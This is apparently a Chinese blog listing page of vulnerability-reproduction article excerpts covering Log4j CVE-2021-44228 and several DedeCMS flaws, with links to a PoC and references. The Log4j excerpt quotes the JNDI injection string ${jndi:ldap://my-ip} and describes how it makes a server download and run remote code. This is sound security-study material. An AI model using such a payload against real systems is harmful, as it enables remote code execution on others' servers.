
漏洞复现
文章平均质量分 88
rpsate
河东第一萌新
展开
-
Log4j远程代码执行漏洞(CVE-2021-44228)漏洞复现
基本信息漏洞编号:CVE-2021-44228影响版本:2.x<=2.15.0-rc1poc地址:https://gitee.com/lcosmos/apache-log4j-poc在此十分感谢我的寝室长Cosmos提供的poc和技术支持。原理简述当log4j打印的日志内容中包含${jndi:ldap://my-ip}时,程序就会通过ldap协议访问my-ip这个地址,然后my-ip就会返回一个包含java代码的class文件的地址,然后程序再通过返回的地址下载class文件并执行。漏洞原创 2021-12-11 01:09:43 · 10646 阅读 · 5 评论 -
Dedecms织梦远程写文件漏洞
基本信息漏洞编号:SSV-89354 CVE-ID:CVE-2015-4553 漏洞类别:变量覆盖 实验版本:dedecmsv5.7SP1(部分版本已修复) 利用条件:Apache,dedecms版本为v5.7SP且未修复,自备一台云主机云主机ip:192.168.18.131参考文章:http://blog.nsfocus.net/dedecms-write-file-vuln/https://seclists.org/fulldisclosure/2015/Jun/472015年6月17日原创 2021-07-28 14:39:58 · 1147 阅读 · 0 评论 -
DeDecms任意用户登录,管理员密码重置漏洞
基本信息漏洞编号:SSV-97087 实验版本:dedecms v5.7SP2下载地址:http://updatenew.dedecms.com/base-v57/package/DedeCMS-V5.7-UTF8-SP2.tar.gz参考文章:https://www.seebug.org/vuldb/ssvid-97074前置知识如果要把一个key存储到cookie中,织梦的存储方式是把key和加密key同时存储在cookie中。每次读取用户传来的key时,将key进行加密后与传来的加密k原创 2021-07-28 14:33:10 · 4236 阅读 · 0 评论 -
织梦cms前台任意用户密码修改
基本信息漏洞编号:SSV-97074实验版本:dedecms v5.3下载地址:http://www.dedecms.com/upimg/soft/2008/DedecmsV53-UTF8-Final.tar.gz参考文章:https://www.seebug.org/vuldb/ssvid-97074https://blog.youkuaiyun.com/qq_51569535/article/details/109211295https://blog.youkuaiyun.com/l1028386804/arti原创 2021-07-28 14:22:48 · 786 阅读 · 0 评论